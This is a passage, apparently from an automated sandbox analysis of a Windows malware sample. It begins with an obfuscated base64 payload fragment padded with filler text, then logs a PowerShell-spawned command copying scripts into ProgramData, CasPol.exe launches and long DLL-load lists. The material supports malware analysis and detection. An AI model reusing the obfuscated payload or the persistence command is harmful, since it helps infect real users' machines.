sa8NyssaEINyssaQQBTNyssaEUNyssaNgNyssa0NyssaF8NyssaUwBUNyssaEENyssaUgBUNyssaD4NyssaPgNyssanNyssaDsNyssaJNyssaBoNyssaGUNyssacgBiNyssaGkNyssadgBvNyssaHINyssaaQB0NyssaHkNyssaINyssaNyssa9NyssaCNyssaNyssaJwNyssa8NyssaDwNyssaQgBBNyssaFMNyssaRQNyssa2NyssaDQNyssaXwBFNyssaE4NyssaRNyssaNyssa+NyssaD4NyssaJwNyssa7NyssaCQNyssabgBhNyssaGINyssabwBiNyssaGUNyssacgB5NyssaCNyssaNyssaPQNyssagNyssaCQNyssaYwBhNyssaHMNyssadNyssaByNyssaGUNyssabgBzNyssaGkNyssaYQBsNyssaC4NyssaSQBuNyssaGQNyssaZ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\microsiphonula.js" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<S